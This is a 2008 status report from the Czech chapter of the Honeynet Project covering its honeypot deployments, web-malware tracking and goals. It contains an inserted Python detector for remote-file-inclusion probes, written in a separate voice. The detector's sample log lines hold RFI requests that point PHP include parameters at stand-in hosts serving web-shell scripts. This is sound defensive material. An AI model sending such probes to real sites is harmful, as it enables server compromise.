Czech Chapter Status Report For 2008

 
 
ORGANIZATION
 
1. Changes in the structure of your organization.
 

  • We have one new member, his name is Jan Snajdr.

 
2. List current chapter members and their activities
 

  • David Vorel - Honeypots deployment, data analyst
  • Petr Hromadko - Honeypots deployment
  • Ales Hrabe - Honeypots deployment, webmaster
  • Jan Snajdr - New member - mainly data analyst

 
DEPLOYMENTS
 
1. List current technologies deployed.
 
Low interaction:
 

  • 11x Nepenthes sensors spread over 20 external IPs
  • 5x Kojoney SSH honeypots
  • Many parsers for RFI attacks (covering about 150 domains)

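The RFI parsers listed above are not described further in the report. As an added example (my own code, not the chapter's parsers), the block below shows the core of such a parser from the defender's side: it reads Apache "combined" access-log lines (format assumed), flags requests whose query parameters carry an absolute URL, which is the signature of a remote-file-inclusion probe against PHP include() parameters, and tallies the hosts used to serve the payload so they can be tracked or blocked. The sample log lines are constructed for the example and use example.net/example.org hosts.

```python
"""Detect remote-file-inclusion (RFI) attempts in Apache access logs.

Added example, not the chapter's own parser. Assumes the Apache
"combined" log format; payload hosts in the sample data are constructed.
"""
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Apache "combined" log format (assumed for this example).
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+'
)

# An absolute URL at the start of a parameter value (case-insensitive scheme).
REMOTE_URL_RE = re.compile(r'^(?:https?|ftp)://', re.IGNORECASE)


def rfi_values(target):
    """Return (param, remote_host) for each query parameter pointing at a remote URL."""
    hits = []
    query = urlsplit(target).query
    for name, value in parse_qsl(query, keep_blank_values=True):
        # parse_qsl decodes one layer; decode again to catch double-encoded probes.
        value = unquote(value)
        if REMOTE_URL_RE.match(value):
            host = urlsplit(value).hostname or ''
            hits.append((name, host))
    return hits


def scan_log(lines):
    """Yield one dict per RFI attempt found in the access-log lines."""
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # unparseable line: skip rather than crash
        for param, host in rfi_values(m.group('target')):
            yield {
                'client': m.group('client'),
                'param': param,
                'remote_host': host,
                'status': int(m.group('status')),
            }


def remote_hosts(lines):
    """Map each payload host to the number of probes that referenced it."""
    counts = {}
    for hit in scan_log(lines):
        counts[hit['remote_host']] = counts.get(hit['remote_host'], 0) + 1
    return counts


# Constructed sample lines (private client IPs, example.* payload hosts).
SAMPLE_LOG = [
    '10.0.0.5 - - [12/Oct/2008:03:14:07 +0200] "GET /index.php?page=about HTTP/1.1" 200 512',
    '10.0.0.9 - - [12/Oct/2008:03:15:22 +0200] "GET /index.php?page=http://payload.example.net/r57.txt? HTTP/1.1" 200 2048',
    '10.0.0.9 - - [12/Oct/2008:03:15:23 +0200] "GET /forum/config.php?inc=http%3A%2F%2Fpayload.example.net%2Fid.txt%3F HTTP/1.1" 404 301',
    '10.0.0.7 - - [12/Oct/2008:03:16:01 +0200] "GET /gallery/?dir=ftp://mirror.example.org/shell.txt HTTP/1.1" 500 0',
    'garbage line that does not parse',
]

if __name__ == '__main__':
    for hit in scan_log(SAMPLE_LOG):
        print(hit)
    print(remote_hosts(SAMPLE_LOG))
```

The host tally is what a chapter would feed into a tracking database: a status of 200 on a flagged request is worth a closer look at the application, while the remote hosts themselves are the candidates for blocking and for later collection of the payloads in a sandbox.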
 
High interaction:
 

  • 5x Honeyclient - each on its own hardware (running VMware GSX) with an external IP. All clients are configured to use one "master" proxy server, which can in turn use another 15 upstream proxies for simple tasks and to make backlog analysis possible.
  • 2x Sensor aka "HoneyForum" - phpBB-based forums used for tracking web spam bots (one on a third-party domain, one on a second-party .info domain)
  • 1x Native Linux server, also used as a sandbox for running specific Perl/PHP/binary code in a highly monitored environment (grsecurity + L2 bridge with QoS and pcap monitor)

 
2. Activity timeline: Highlight attacks, compromises, and interesting information collected.
 

  • 02/08 - Botnet visualization
  • 09/08 - We deployed a set of Honeyclients - http://www.honeynet.cz/img/clienthoneypots-big.png
  • 10/08 - We focused on web malware; since then our running sensors find approx. 20 sites hosting malware each day.

 
RESEARCH AND DEVELOPMENT
 
1. List any new tools, projects or ideas you are currently researching or developing.
 

  • We'd like to deploy more web honeypots on different applications (Drupal, WordPress, SMF, YaBB, etc.) and also focus on this category, as it is the current trend in spreading malicious URLs around the world.
  • We'd also like to deploy more Honeyclient sensors to scale up throughput in malicious URL testing (we receive 100k URLs/day but can test only 10k URLs/day).

 
FINDINGS
 

1. Highlight any unique findings, attacks, tools, or methods.
 

  • HTTP-based botnets breaking CAPTCHAs at Google/Yahoo/Live.

 
2. Any trends seen in the past year ?
 

  • More and more kinds of malicious sites hosting malware.

 
3. What are you using for data analysis?
 

  • A bunch of "well known" tools (Tcpdump/Tshark/Ethereal, Chaosreader for pcaps).
  • Sandboxes - native/virtual

 
 
PAPERS AND PRESENTATIONS
 

  • Botnet map based on our tracking database - http://www.csoonline.com/article/348317/What_a_Botnet_Looks_Like
  • Talk about the Czech Chapter (in Czech only; simply past and future, main goals, etc.) - http://www.secit.sk/content/rozhovor-so-zakladatelom-honeynetcz

 
 
GOALS
 
1. Which of your goals did you meet for the past year ?
 

  • We started doing serious research on our data collected from HoneyForum.

 
2. Goals for the next year.
 

  • More workshops for the public.
  • We'd like to obtain official status as a non-profit organization this year.

 
 
